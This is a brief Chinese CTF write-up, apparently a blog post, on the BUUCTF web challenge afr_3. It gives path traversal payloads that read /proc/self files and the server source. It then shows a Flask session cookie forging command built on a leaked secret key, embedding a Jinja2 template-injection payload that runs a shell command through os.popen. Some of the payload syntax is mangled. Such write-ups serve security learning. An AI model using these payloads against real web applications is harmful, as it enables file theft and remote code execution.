BUUCTF afr_31

(一)BUUCTF web afr_3 考察linux中/proc/目录的理解,以及flash模板注入

(1)name=../../../../../proc/self/cmdline
(2)name=../../../../../proc/self/cwd/server.py  (最后的py文件可以改变)

(二)BUUCTF afr_3 使用的是文件路径穿越漏洞,可以通过以上两行代码,查询到flag文件,
使用python3 ./flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{ {''.class.mro[2].subclasses()[71].init.globals['os'].popen('cat flag.py').read()}}'}" 进行伪造。
这个命令看起来是在使用 Flask Session Cookie Manager 工具来对会话数据进行编码。具体来说,它执行了以下操作:

1、使用 flask_session_cookie_manager3.py 脚本。
2、使用 encode 子命令表示要对会话数据进行编码。
3、使用 -s 选项指定会话密钥,这里是 "Drmhze6EPcv0fN_81Bj-nA"

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值